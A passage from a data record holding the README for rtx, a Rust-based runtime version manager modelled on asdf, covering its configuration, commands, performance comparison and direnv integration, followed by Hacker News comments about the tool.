definitely not the case IMO. I prefer the term \"idiomatic\"\n> version files since they're version files not specific to asdf/rtx and can be used by other tools.\n> (`.nvmrc` being a notable exception, which is tied to a specific tool.)\n\n### Global config: `~/.config/rtx/config.toml`\n\nrtx can be configured in `~/.config/rtx/config.toml`. The following options are available (defaults shown):\n\n```toml\n# whether to prompt to install plugins and runtimes if they're not already installed\nmissing_runtime_behavior = 'prompt' # other options: 'ignore', 'warn', 'prompt', 'autoinstall'\n\n# plugins can read the versions files used by other version managers (if enabled by the plugin)\n# for example, .nvmrc in the case of nodejs's nvm\nlegacy_version_file = true # enabled by default (different than asdf)\n\n# configure `rtx install` to always keep the downloaded archive\nalways_keep_download = false # deleted after install by default\n\n# configure how frequently (in minutes) to fetch updated plugin repository changes\n# this is updated whenever a new runtime is installed\n# (note: this isn't currently implemented but there are plans to add it: https://github.com/jdxcode/rtx/issues/128)\nplugin_autoupdate_last_check_duration = 10080 # (one week) set to 0 to disable updates\n\njobs = 4 # number of plugins or runtimes to install in parallel. The default is `4`.\n\nverbose = false # see explanation under `RTX_VERBOSE`\n\n[alias.nodejs]\nmy_custom_node = '18' # makes `rtx install nodejs@my_custom_node` install node-18.x\n # this can also be specified in a plugin (see below in \"Aliases\")\n```\n\nThese settings can also be managed with `rtx settings ls|get|set|unset`.\n\n### Environment variables\n\nrtx can also be configured via environment variables. The following options are available:\n\n#### `RTX_MISSING_RUNTIME_BEHAVIOR`\n\nThis is the same as the `missing_runtime_behavior` config option in `~/.config/rtx/config.toml`.\n\n#### `RTX_DATA_DIR`\n\nThis is the directory where rtx stores its data. The default is `~/.local/share/rtx`.\n\n```sh-session\n$ RTX_MISSING_RUNTIME_BEHAVIOR=ignore rtx install nodejs@20\n$ RTX_NODEJS_VERSION=20 rtx exec -- node --version\n```\n\n#### `RTX_CONFIG_FILE`\n\nThis is the path to the config file. The default is `~/.config/rtx/config.toml`.\n(Or `$XDG_CONFIG_HOME/config.toml` if that is set)\n\n#### `RTX_DEFAULT_TOOL_VERSIONS_FILENAME`\n\nSet to something other than \".tool-versions\" to have rtx look for configuration with alternate names.\n\n#### `RTX_${PLUGIN}_VERSION`\n\nSet the version for a runtime. For example, `RTX_NODEJS_VERSION=20` will use nodejs@20.x regardless\nof what is set in `.tool-versions`.\n\n#### `RTX_LEGACY_VERSION_FILE`\n\nPlugins can read the versions files used by other version managers (if enabled by the plugin)\nfor example, .nvmrc in the case of nodejs's nvm.\n\n#### `RTX_LOG_LEVEL=trace|debug|info|warn|error`\n\nCan also use `RTX_DEBUG=1`, `RTX_TRACE=1`, and `RTX_QUIET=1`. These adjust the log\noutput to the screen.\n\n#### `RTX_LOG_FILE=~/.rtx/rtx.log`\n\nOutput logs to a file.\n\n#### `RTX_LOG_FILE_LEVEL=trace|debug|info|warn|error`\n\nSame as `RTX_LOG_LEVEL` but for the log file output level. This is useful if you want\nto store the logs but not have them litter your display.\n\n#### `RTX_JOBS=1`\n\nSet the number plugins or runtimes to install in parallel. The default is `4`.\n\n#### `RTX_VERBOSE=1`\n\nThis shows the installation output during `rtx install` and `rtx plugin install`.\nThis should likely be merged so it behaves the same as `RTX_DEBUG=1` and we don't have\n2 configuration for the same thing, but for now it is it's own config.\n\n#### `RTX_HIDE_OUTDATED_BUILD=1`\n\nIf a release is 12 months old, it will show a warning message every time it launches:\n\n```\nrtx has not been updated in over a year. Please update to the latest version.\n```\n\nYou likely do not want to be using rtx if it is that old. I'm doing this instead of\nautoupdating. If, for some reason, you want to stay on some old version, you can hide\nthis message with `RTX_HIDE_OUTDATED_BUILD=1`.\n\n## Aliases\n\nrtx supports aliasing the versions of runtimes. One use-case for this is to define aliases for LTS\nversions of runtimes. For example, you may want to specify `lts/hydrogen` as the version for nodejs@18.x.\nSo you can use the runtime with `nodejs lts/hydrogen` in `.tool-versions`.\n\nUser aliases can be created by adding an `alias.` section to `~/.config/rtx/config.toml`:\n\n```toml\n[alias.nodejs]\nmy_custom_18 = '18'\n```\n\nPlugins can also provide aliases via a `bin/list-aliases` script. Here is an example showing node.js\nversions:\n\n```bash\n#!/usr/bin/env bash\n\necho \"lts/hydrogen 18\"\necho \"lts/gallium 16\"\necho \"lts/fermium 14\"\n```\n\n> **Note:**\n>\n> Because this is rtx-specific functionality not currently used by asdf it isn't likely to be in any\n> plugin currently, but plugin authors can add this script without impacting asdf users.\n\n## Plugins\n\nrtx uses asdf's plugin ecosystem under the hood. See https://github.com/asdf-vm/asdf-plugins for a\nlist.\n\n## FAQs\n\n### I don't want to put a `.tool-versions` file into my project since git shows it as an untracked file.\n\nYou can make git ignore these files in 3 different ways:\n\n- Adding `.tool-versions` to project's `.gitignore` file. This has the downside that you need to commit the change to the ignore file.\n- Adding `.tool-versions` to project's `.git/info/exclude`. This file is local to your project so there is no need to commit it.\n- Adding `.tool-versions` to global gitignore (`core.excludesFile`). This will cause git to ignore `.tool-versions` files in all projects. You can explicitly add one to a project if needed with `git add --force .tool-versions`.\n\n### How do I create my own plugin?\n\nJust follow the [asdf docs](https://asdf-vm.com/plugins/create.html). Everything should work the same.\nIf it isn't, please open an issue.\n\n### rtx is failing or not working right\n\nFirst try setting `RTX_LOG_LEVEL=debug` or `RTX_LOG_LEVEL=trace` and see if that gives you more information.\nYou can also set `RTX_LOG_FILE=/path/to/logfile` to write the logs to a file.\n\nIf something is happening with the activate hook, you can try disabling it and calling `eval \"$(rtx hook-env)\"` manually.\nIt can also be helpful to use `rtx env` to see what environment variables it wants to use.\n\nLastly, there is an `rtx doctor` command. It doesn't have much in it but I hope to add more functionality\nto that to help debug issues.\n\n### Windows support?\n\nThis is something we'd like to add! https://github.com/jdxcode/rtx/discussions/66\n\nIt's not a near-term goal and it would require plugin modifications, but\nit should be feasible.\n\n## Commands\n\n### `rtx activate`\n\n```\nEnables rtx to automatically modify runtimes when changing directory\n\nThis should go into your shell's rc file.\nOtherwise, it will only take effect in the current session.\n(e.g. ~/.bashrc)\n\nUsage: activate [OPTIONS] [SHELL_TYPE]\n\nArguments:\n [SHELL_TYPE]\n Shell type to generate the script for\n \n [possible values: bash, fish, xonsh, zsh]\n\nOptions:\n -q, --quiet\n Hide the \"rtx: @\" message when changing directories\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ eval \"$(rtx activate bash)\"\n $ eval \"$(rtx activate zsh)\"\n $ rtx activate fish | source\n $ execx($(rtx activate xonsh))\n\n```\n### `rtx alias ls`\n\n```\nList aliases\nShows the aliases that can be specified.\nThese can come from user config or from plugins in `bin/list-aliases`.\n\nFor user config, aliases are defined like the following in `~/.config/rtx/config.toml`:\n\n [alias.nodejs]\n lts = \"18.0.0\"\n\nUsage: ls [OPTIONS]\n\nOptions:\n -p, --plugin \n Show aliases for \n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx aliases\n nodejs lts/hydrogen 18.0.0\n\n```\n### `rtx complete`\n\n```\ngenerate shell completions\n\nUsage: complete --shell \n\nOptions:\n -s, --shell \n shell type\n \n [possible values: bash, elvish, fish, powershell, zsh]\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx complete\n\n```\n### `rtx current`\n\n```\nShows currently active, and installed runtime versions\n\nThis is similar to `rtx list --current`, but this\nonly shows the runtime and/or version so it's\ndesigned to fit into scripts more easily.\n\nUsage: current [PLUGIN]\n\nArguments:\n [PLUGIN]\n plugin to show versions of\n \n e.g.: ruby, nodejs\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n # outputs `.tool-versions` compatible format\n $ rtx current\n python 3.11.0 3.10.0\n shfmt 3.6.0\n shellcheck 0.9.0\n nodejs 18.13.0\n\n $ rtx current nodejs\n 18.13.0\n\n # can output multiple versions\n $ rtx current python\n 3.11.0 3.10.0\n\n```\n### `rtx deactivate`\n\n```\ndisable rtx for current shell session\n\nThis can be used to temporarily disable rtx in a shell session.\n\nUsage: deactivate [SHELL_TYPE]\n\nArguments:\n [SHELL_TYPE]\n shell type to generate the script for\n \n [possible values: bash, fish, xonsh, zsh]\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ eval \"$(rtx deactivate bash)\"\n $ eval \"$(rtx deactivate zsh)\"\n $ rtx deactivate fish | source\n $ execx($(rtx deactivate xonsh))\n\n```\n### `rtx direnv activate`\n\n```\nOutput direnv function to use rtx inside direnv\n\nSee https://github.com/jdxcode/rtx#direnv for more information\n\nBecause this generates the legacy files based on currently installed plugins,\nyou should run this command after installing new plugins. Otherwise\ndirenv may not know to update environment variables when legacy file versions change.\n\nUsage: activate\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx direnv activate > ~/.config/direnv/lib/use_rtx.sh\n $ echo 'use rtx' > .envrc\n $ direnv allow\n\n```\n### `rtx doctor`\n\n```\nCheck rtx installation for possible problems.\n\nUsage: doctor\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx doctor\n [WARN] plugin nodejs is not installed\n\n```\n### `rtx env`\n\n```\nexports env vars to activate rtx in a single shell session\n\nIt's not necessary to use this if you have `rtx activate` in your shell rc file.\nUse this if you don't want to permanently install rtx.\nThis can be used similarly to `asdf shell`.\nUnfortunately, it requires `eval` to work since it's not written in Bash though.\nIt's also useful just to see what environment variables rtx sets.\n\nUsage: env [OPTIONS] [RUNTIME]...\n\nArguments:\n [RUNTIME]...\n runtime version to use\n\nOptions:\n -s, --shell \n Shell type to generate environment variables for\n \n [possible values: bash, fish, xonsh, zsh]\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ eval \"$(rtx env -s bash)\"\n $ eval \"$(rtx env -s zsh)\"\n $ rtx env -s fish | source\n $ execx($(rtx env -s xonsh))\n\n```\n### `rtx exec`\n\n```\nexecute a command with runtime(s) set\n\nuse this to avoid modifying the shell session or running ad-hoc commands with the rtx runtimes\nset.\n\nRuntimes will be loaded from .tool-versions, though they can be overridden with args\nNote that only the plugin specified will be overridden, so if a `.tool-versions` file\nincludes \"nodejs 20\" but you run `rtx exec python@3.11`; it will still load nodejs@20.\n\nThe \"--\" separates runtimes from the commands to pass along to the subprocess.\n\nUsage: exec [OPTIONS] [RUNTIME]... [-- ...]\n\nArguments:\n [RUNTIME]...\n runtime(s) to start\n \n e.g.: nodejs@20 python@3.10\n\n [COMMAND]...\n the command string to execute (same as --command)\n\nOptions:\n -c, --command \n the command string to execute\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n rtx exec nodejs@20 -- node ./app.js # launch app.js using node-20.x\n rtx x nodejs@20 -- node ./app.js # shorter alias\n\n # Specify command as a string:\n rtx exec nodejs@20 python@3.11 --command \"node -v && python -V\"\n\n```\n### `rtx global`\n\n```\nsets global .tool-versions to include a specified runtime\n\nthen displays the contents of ~/.tool-versions\nthis file is `$HOME/.tool-versions` by default\nuse `rtx local` to set a runtime version locally in the current directory\n\nUsage: global [OPTIONS] [RUNTIME]...\n\nArguments:\n [RUNTIME]...\n runtime(s) to add to .tool-versions\n \n e.g.: nodejs@20\n if this is a single runtime with no version, the current value of the global\n .tool-versions will be displayed\n\nOptions:\n --pin\n save exact version to `.tool-versions`\n \n e.g.: `rtx global --pin nodejs@20` will save `nodejs 20.0.0` to .tool-versions,\n\n --remove \n remove the plugin(s) from ~/.tool-versions\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n # set the current version of nodejs to 20.x\n # will use a precise version (e.g.: 20.0.0) in .tool-versions file\n $ rtx global nodejs@20\n\n # set the current version of nodejs to 20.x\n # will use a fuzzy version (e.g.: 20) in .tool-versions file\n $ rtx global --fuzzy nodejs@20\n\n # show the current version of nodejs in ~/.tool-versions\n $ rtx global nodejs\n 20.0.0\n\n```\n### `rtx install`\n\n```\ninstall a runtime\n\nthis will install a runtime to `~/.local/share/rtx/installs//`\nit won't be used simply by being installed, however.\nFor that, you must set up a `.tool-version` file manually or with `rtx local/global`.\nOr you can call a runtime explicitly with `rtx exec @ -- `.\n\nRuntimes will be installed in parallel. To disable, set `--jobs=1` or `RTX_JOBS=1`\n\nUsage: install [OPTIONS] [RUNTIME]...\n\nArguments:\n [RUNTIME]...\n runtime(s) to install\n \n e.g.: nodejs@20\n\nOptions:\n -p, --plugin \n only install runtime(s) for \n\n -f, --force\n force reinstall even if already installed\n\n -v, --verbose...\n Show installation output\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx install nodejs@18.0.0 # install specific nodejs version\n $ rtx install nodejs@18 # install fuzzy nodejs version\n $ rtx install nodejs # install version specified in .tool-versions\n $ rtx install # installs all runtimes specified in .tool-versions for installed plugins\n $ rtx install --all # installs all runtimes and all plugins\n\n```\n### `rtx latest`\n\n```\nget the latest runtime version of a plugin's runtimes\n\nUsage: latest \n\nArguments:\n \n Runtime to get the latest version of\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx latest nodejs@18 # get the latest version of nodejs 18\n 18.0.0\n\n $ rtx latest nodejs # get the latest stable version of nodejs\n 20.0.0\n\n```\n### `rtx local`\n\n```\nSets .tool-versions to include a specific runtime\n\nthen displays the contents of .tool-versions\nuse this to set the runtime version when within a directory\nuse `rtx global` to set a runtime version globally\n\nUsage: local [OPTIONS] [RUNTIME]...\n\nArguments:\n [RUNTIME]...\n runtimes to add to .tool-versions\n \n e.g.: nodejs@20\n if this is a single runtime with no version,\n the current value of .tool-versions will be displayed\n\nOptions:\n -p, --parent\n recurse up to find a .tool-versions file rather than using the current directory only\n by default this command will only set the runtime in the current directory (\"$PWD/.tool-versions\")\n\n --pin\n save exact version to `.tool-versions`\n \n e.g.: `rtx local --pin nodejs@20` will save `nodejs 20.0.0` to .tool-versions,\n\n --remove \n remove the plugin(s) from .tool-versions\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n # set the current version of nodejs to 20.x for the current directory\n # will use a precise version (e.g.: 20.0.0) in .tool-versions file\n $ rtx local nodejs@20\n\n # set nodejs to 20.x for the current project (recurses up to find .tool-versions)\n $ rtx local -p nodejs@20\n\n # set the current version of nodejs to 20.x for the current directory\n # will use a fuzzy version (e.g.: 20) in .tool-versions file\n $ rtx local --fuzzy nodejs@20\n\n # removes nodejs from .tool-versions\n $ rtx local --remove=nodejs\n\n # show the current version of nodejs in .tool-versions\n $ rtx local nodejs\n 20.0.0\n\n```\n### `rtx ls`\n\n```\nlist installed runtime versions\n\nThe \"arrow (->)\" indicates the runtime is installed, active, and will be used for running commands.\n(Assuming `rtx activate` or `rtx env` is in use).\n\nUsage: ls [OPTIONS]\n\nOptions:\n -p, --plugin \n Only show runtimes from [PLUGIN]\n\n -c, --current\n Only show runtimes currently specified in .tool-versions\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx list\n -> nodejs 20.0.0 (set by ~/src/myapp/.tool-versions)\n -> python 3.11.0 (set by ~/.tool-versions)\n python 3.10.0\n\n $ rtx list --current\n -> nodejs 20.0.0 (set by ~/src/myapp/.tool-versions)\n -> python 3.11.0 (set by ~/.tool-versions)\n\n```\n### `rtx ls-remote`\n\n```\nlist runtime versions available for install\n\nnote that these versions are cached for commands like `rtx install nodejs@latest`\nhowever _this_ command will always clear that cache and fetch the latest remote versions\n\nUsage: ls-remote \n\nArguments:\n \n Plugin\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx list-remote nodejs\n 18.0.0\n 20.0.0\n\n```\n### `rtx plugins install`\n\n```\ninstall a plugin\n\nnote that rtx automatically can install plugins when you install a runtime\ne.g.: `rtx install nodejs@18` will autoinstall the nodejs plugin\n\nThis behavior can be modified in ~/.rtx/config.toml\n\nUsage: install [OPTIONS] [NAME] [GIT_URL]\n\nArguments:\n [NAME]\n The name of the plugin to install\n \n e.g.: nodejs, ruby\n\n [GIT_URL]\n The git url of the plugin\n \n e.g.: https://github.com/asdf-vm/asdf-nodejs.git\n\nOptions:\n -f, --force\n Reinstall even if plugin exists\n\n -a, --all\n Install all missing plugins\n \n This will only install plugins that have matching shortnames.\n i.e.: they don't need the full git repo url\n\n -v, --verbose...\n Show installation output\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx install nodejs # install the nodejs plugin using the shorthand repo:\n # https://github.com/asdf-vm/asdf-plugins\n\n $ rtx install nodejs https://github.com/asdf-vm/asdf-nodejs.git\n # install the nodejs plugin using the git url\n\n $ rtx install https://github.com/asdf-vm/asdf-nodejs.git\n # install the nodejs plugin using the git url only\n # (nodejs is inferred from the url)\n\n```\n### `rtx plugins ls`\n\n```\nList installed plugins\n\nCan also show remotely available plugins to install.\n\nUsage: ls [OPTIONS]\n\nOptions:\n -a, --all\n list all available remote plugins\n \n same as `rtx plugins ls-remote`\n\n -u, --urls\n show the git url for each plugin\n \n e.g.: https://github.com/asdf-vm/asdf-nodejs.git\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx plugins ls\n nodejs\n ruby\n\n $ rtx plugins ls --urls\n nodejs https://github.com/asdf-vm/asdf-nodejs.git\n ruby https://github.com/asdf-vm/asdf-ruby.git\n\n```\n### `rtx plugins ls-remote`\n\n```\nList all available remote plugins\n\nThese are fetched from https://github.com/asdf-vm/asdf-plugins\n\nExamples:\n $ rtx plugins ls-remote\n\n\nUsage: ls-remote [OPTIONS]\n\nOptions:\n -u, --urls\n show the git url for each plugin\n \n e.g.: https://github.com/asdf-vm/asdf-nodejs.git\n\n -h, --help\n Print help (see a summary with '-h')\n\n```\n### `rtx plugins uninstall`\n\n```\nremoves a plugin\n\nUsage: uninstall \n\nArguments:\n \n plugin to remove\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx uninstall nodejs\n\n```\n### `rtx plugins update`\n\n```\nupdates a plugin to the latest version\n\nnote: this updates the plugin itself, not the runtime versions\n\nUsage: update [OPTIONS] [PLUGIN]...\n\nArguments:\n [PLUGIN]...\n plugin(s) to update\n\nOptions:\n -a, --all\n update all plugins\n\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx plugins update --all # update all plugins\n $ rtx plugins update nodejs # update only nodejs\n\n```\n### `rtx settings get`\n\n```\nShow a current setting\n\nThis is the contents of a single entry in ~/.config/rtx/config.toml\n\nNote that aliases are also stored in this file\nbut managed separately with `rtx aliases get`\n\nUsage: get \n\nArguments:\n \n The setting to show\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx settings get legacy_version_file\n true\n\n```\n### `rtx settings ls`\n\n```\nShow current settings\n\nThis is the contents of ~/.config/rtx/config.toml\n\nNote that aliases are also stored in this file\nbut managed separately with `rtx aliases`\n\nUsage: ls\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx settings\n legacy_version_file = false\n\n```\n### `rtx settings set`\n\n```\nAdd/update a setting\n\nThis modifies the contents of ~/.config/rtx/config.toml\n\nUsage: set \n\nArguments:\n \n The setting to set\n\n \n The value to set\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx settings set legacy_version_file true\n\n```\n### `rtx settings unset`\n\n```\nClears a setting\n\nThis modifies the contents of ~/.config/rtx/config.toml\n\nUsage: unset \n\nArguments:\n \n The setting to remove\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx settings unset legacy_version_file\n\n```\n### `rtx uninstall`\n\n```\nremoves runtime versions\n\nUsage: uninstall ...\n\nArguments:\n ...\n runtime(s) to remove\n\nOptions:\n -h, --help\n Print help (see a summary with '-h')\n\nExamples:\n $ rtx uninstall nodejs@18.0.0 # will uninstall specific version\n $ rtx uninstall nodejs # will uninstall current nodejs version\n\n```\n### `rtx version`\n\n```\nShow rtx version\n\nUsage: version\n\nOptions:\n -h, --help\n Print help\n\n```\n\n## Comparison to asdf\n\nrtx is mostly a clone of asdf, but there are notable areas where improvements have been made.\n\n### Performance\n\nasdf made (what I consider) a poor design decision to use shims that go between a call to a runtime\nand the runtime itself. e.g.: when you call `node` it will call an asdf shim file `~/.asdf/shims/node`,\nwhich then calls `asdf exec`, which then calls the correct version of node.\n\nThese shims have terrible performance, adding ~120ms to every runtime call. rtx does not use shims and instead\nupdates `PATH` so that it doesn't have any overhead when simply calling binaries. These shims are the main reason that I wrote this.\n\nI don't think it's possible for asdf to fix these issues. The author of asdf did a great writeup\nof [performance problems](https://stratus3d.com/blog/2022/08/11/asdf-performance/). asdf is written\nin bash which certainly makes it challenging to be performant, however I think the real problem is the\nshim design. I don't think it's possible to fix that without a complete rewrite.\n\nrtx does call an internal command `rtx hook-env` every time the directory has changed, but because\nit's written in Rust, this is very quick\u2014taking ~10ms on my machine. 4ms if there are no changes, 14ms if it's\na full reload.\n\ntl;dr: asdf adds overhead (~120ms) when calling a runtime, rtx adds a small amount of overhead (~10ms)\nwhen the prompt loads.\n\n### Environment variables\n\nasdf only helps manage runtime executables. However, some tools are managed via environment variables\n(notably Java which switches via `JAVA_HOME`). This isn't supported very well in asdf and requires\na separate shell extension just to manage.\n\nHowever asdf _plugins_ have a `bin/exec-env` script that is used for exporting environment variables\nlike [`JAVA_HOME`](https://github.com/halcyon/asdf-java/blob/master/bin/exec-env). rtx simply exports\nthe environment variables from the `bin/exec-env` script in the plugin but places them in the shell\nfor _all_ commands. In asdf it only exports those commands when the shim is called. This means if you\ncall `java` it will set `JAVA_HOME`, but not if you call some Java tool like `mvn`.\n\nThis means we're just using the existing plugin script but because rtx doesn't use shims it can be\nused for more things. It would be trivial to make a plugin that exports arbitrary environment\nvariables like [dotenv](https://github.com/motdotla/dotenv) or [direnv](https://github.com/direnv/direnv).\n\n### UX\n\nSome commands are the same in asdf but others have been changed. Everything that's possible\nin asdf should be possible in rtx but may use slightly different syntax. rtx has more forgiving commands,\nsuch as using fuzzy-matching, e.g.: `rtx install nodejs@18`. While in asdf you _can_ run\n`asdf install nodejs latest:18`, you can't use `latest:18` in a `.tool-versions` file or many other places.\nIn `rtx` you can use fuzzy-matching everywhere.\n\nasdf requires several steps to install a new runtime if the plugin isn't installed, e.g.:\n\n```sh-session\n$ asdf plugin add nodejs\n$ asdf install nodejs latest:18\n$ asdf local nodejs latest:18\n```\n\nIn `rtx` this can all be done in a single step to set the local runtime version. If the plugin\nand/or runtime needs to be installed it will prompt:\n\n```sh-session\n$ asdf local nodejs@18\nrtx: Would you like to install nodejs@18.13.0? [Y/n] Y\nTrying to update node-build... ok\nDownloading node-v18.13.0-darwin-arm64.tar.gz...\n-> https://nodejs.org/dist/v18.13.0/node-v18.13.0-darwin-arm64.tar.gz\nInstalling node-v18.13.0-darwin-arm64...\nInstalled node-v18.13.0-darwin-arm64 to /Users/jdx/.local/share/rtx/installs/nodejs/18.13.0\n$ node -v\nv18.13.0\n```\n\nI've found asdf to be particularly rigid and difficult to learn. It also made strange decisions like\nhaving `asdf list all` but `asdf latest --all` (why is one a flag and one a positional argument?).\n`rtx` makes heavy use of aliases so you don't need to remember if it's `rtx plugin add nodejs` or\n`rtx plugin install nodejs`. If I can guess what you meant, then I'll try to get rtx to respond\nin the right way.\n\nThat said, there are a lot of great things about asdf. It's the best multi-runtime manager out there\nand I've really been impressed with the plugin system. Most of the design decisions the authors made\nwere very good. I really just have 2 complaints: the shims and the fact it's written in Bash.\n\n## direnv\n\n[direnv](https://direnv.net) and rtx both manage environment variables based on directory. Because they both analyze\nthe current environment variables before and after their respective \"hook\" commands are run, they can conflict with each other.\nAs a result, there were a [number of issues with direnv](https://github.com/jdxcode/rtx/issues/8).\nHowever, we think we've mitigated these. If you find that rtx and direnv are not working well together,\nplease comment on that ticket ideally with a good description of your directory layout so we can\nreproduce the problem.\n\nIf there are remaining issues, they're likely to do with the ordering of PATH. This means it would\nreally only be a problem if you were trying to manage the same runtime with direnv and rtx. For example,\nyou may use `layout python` in an `.envrc` but also be maintaining a `.tool-versions` file with python\nin it as well.\n\nA more typical usage of direnv would be to set some arbitrary environment variables, or add unrelated\nbinaries to PATH. In these cases, rtx will not interfere with direnv.\n\nAs mentioned in the Quick Start, it is important to make sure that `rtx activate` is called after `direnv hook`\nin the shell rc file. rtx overrides some of the internal direnv state (`DIRENV_DIFF`) so calling\ndirenv first gives rtx the opportunity to make those changes to direnv's state.\n\n### rtx inside of direnv (`use rtx` in `.envrc`)\n\nIf you do encounter issues with `rtx activate`, or just want to use direnv in an alternate way,\nthis is a simpler setup that's less likely to cause issues.\n\nTo do this, first use `rtx` to build a `use_rtx` function that you can use in `.envrc` files:\n\n```sh-session\n$ rtx direnv activate > ~/.config/direnv/lib/use_rtx.sh\n```\n\nNow in your `.envrc` file add the following:\n\n```sh-session\nuse rtx\n```\n\ndirenv will now call rtx to export its environment variables. You'll need to make sure to add `use_rtx`\nto all projects that use rtx (or use direnv's `source_up` to load it from a subdirectory). You can also add `use rtx` to `~/.config/direnv/direnvrc`.\n\nNote that in this method direnv typically won't know to refresh `.tool-versions` files\nunless they're at the same level as a `.envrc` file. You'll likely always want to have\na `.envrc` file next to your `.tool-versions` for this reason. To make this a little\neasier to manage, I encourage _not_ actually using `.tool-versions` at all, and instead\nsetting environment variables entirely in `.envrc`:\n\n```\nexport RTX_NODEJS_VERSION=18.0.0\nexport RTX_PYTHON_VERSION=3.11\n```\n\nOf course if you use `rtx activate`, then these steps won't have been necessary and you can use rtx\nas if direnv was not used.\n\n## Cache Behavior\n\nrtx makes use of caching in many places in order to be efficient. The details about how long to keep\ncache for should eventually all be configurable. There may be gaps in the current behavior where\nthings are hardcoded but I'm happy to add more settings to cover whatever config is needed.\n\nBelow I explain the behavior it uses around caching. If you're seeing behavior where things don't appear\nto be updating, this is a good place to start.\n\n### Plugin Cache\n\nEach plugin has a cache that's stored in `~/.local/share/rtx/plugins//.rtxcache.msgpack.gz`. It stores\nthe list of versions available for that plugin (`rtx ls-remote `) and the legacy filenames (see below).\n\nIt is updated daily by default or anytime that `rtx ls-remote` is called explicitly. The file is\ngzipped messagepack, if you want to view it you can run the following (requires [msgpack-cli](https://github.com/msgpack/msgpack-cli)).\n\n```sh-session\ncat ~/.local/share/rtx/plugins/nodejs/.rtxcache.msgpack.gz | gunzip | msgpack-cli decode\n```\n\n### Runtime Cache\n\nEach runtime (language version, e.g.: `nodejs@20.0.0`), has a file called \"runtimeconf\" that's stored\ninside the install directory, e.g.: `~/.asdf/installs/nodejs/20.0.0/.rtxconf.msgpack`. This stores the\ninformation about the runtime that should not change after installation. Currently this is just the\nbin paths the plugin defines in `bin/list-bin-paths`. By default this is just `/bin`. It's the list\nof paths that rtx will add to `PATH` when the runtime is activated.\n\nI have not seen a plugins which has _dynamic_ bin paths but let me know if you find one. If that is\nthe case, we may need to make this cached instead of static.\n\n\"Runtimeconf\" is stored as uncompressed messagepack and can be viewed with the following:\n\n```\ncat ~/.local/share/rtx/installs/nodejs/18.13.0/.rtxconf.msgpack | msgpack-cli decode\n```\n\n### Legacy File Cache\n\nIf enabled, rtx will read the legacy filenames such as `.node-version` for\n[asdf-nodejs](https://github.com/asdf-vm/asdf-nodejs). This leverages cache in 2 places where the\nplugin is called:\n\n- [`list-legacy-filenames`](https://github.com/asdf-vm/asdf-nodejs/blob/master/bin/list-legacy-filenames)\n In every plugin I've seen this simply returns a static list of filenamed like \".nvmrc .node-version\".\n It's cached alongside the standard \"runtime\" cache which is refreshed daily by default.\n- [`parse-legacy-file`](https://github.com/asdf-vm/asdf-nodejs/blob/master/bin/parse-legacy-file)\n This plugin binary is called to parse a legacy file to get the version out of it. It's relatively\n expensive so every file that gets parsed as a legacy file is cached into `~/.local/share/rtx/legacy_cache`.\n It will remain cached until the file is modified. This is a simple text file that has the path to the\n legacy file stored as a hash for the filename.\n\n## Development\n\nRun tests with `just`:\n\n```sh-session\n$ just test\n```\n\nLint the codebase with:\n\n```sh-session\n$ just lint-fix\n```\n\n", "readme_type": "markdown", "hn_comments": "This looks great, will be working with this in the next few days. I've always had a bad relationship with asdf as it seems to break existing tool management in creative ways that I'm unable to untangle without uninstalling it completely (long story, much thrashing of keyboard and mouse).I like the idea, maybe I'll try it soon. I've recently been using asdf-direnv, configured to switch environments once, manually, and so taking shims out of the $PATH. Definitely giving up a bit of the magic for speed, so not sure if I love the tradeoff.I actually view being written in shell as an advantage for asdf. That means I can just submodule it into my dotfiles and bootstrap my tools without extra steps, no matter where I end up.Ohh, this interesting. I love most things about asdf, but not the fact that it's great big heap of bash scripts. I wonder how hard it would be to get this working on (non-WSL) windows and how a truly universal version manager.Will definitely check this out! I'm a long time asdf user but I always struggle with the shims and long timeouts.I occasionally hit 2sec until my node version is resolved.Nice! I tried something similar at github.com/happenslol/qwer, I'll look at yours to see what you did differently :-)Nice! How long does `node -v` take now?EDIT: OK, I see the main trick is to use PATH instead of shims.> rtx does not use shims and instead updates PATH so that it doesn't have any overhead when simply calling binariesThere is a good reason `asdf-vm` uses shims, and is that it does not have to interplay or worry about other tools that set PATH and tools that need a reference to an executable could be simply set to `~/.asdf/shims`.Ill take it for a spin, but this choice might have a lot of consequences that are not easy to foresee. A good example is `direnv` which as you mention in the README now requires to be set in `.envrc` and then disable global `rtx` hook I guess.Obligatory \"Written in Rust \" after everything written in rust is still funny to me.Glad to see you fixed what I think is a bad UX decision by asdf, using the subcommand `add` for plugins and `install` for runtime versions.This is awesome. Have you seen http://tea.xyz? Made by the creator of brew. I think it has a lot of interesting ideas, especially since it also has some of the same features as asdf/venv/rbenv/etc: managing multiple versions.Figured I'd mention it, because I haven't tried tea yet, but I'm an avid asdf and brew user and I've been looking at asdf alternatives.Great to see someone is trying to provide a better alternative to asdf!> aliases and fuzzy-matchingWhat exactly does fuzzy matching mean? The only examples I see in your README are of the nature rtx install nodejs@20.0.0 Install a specific version 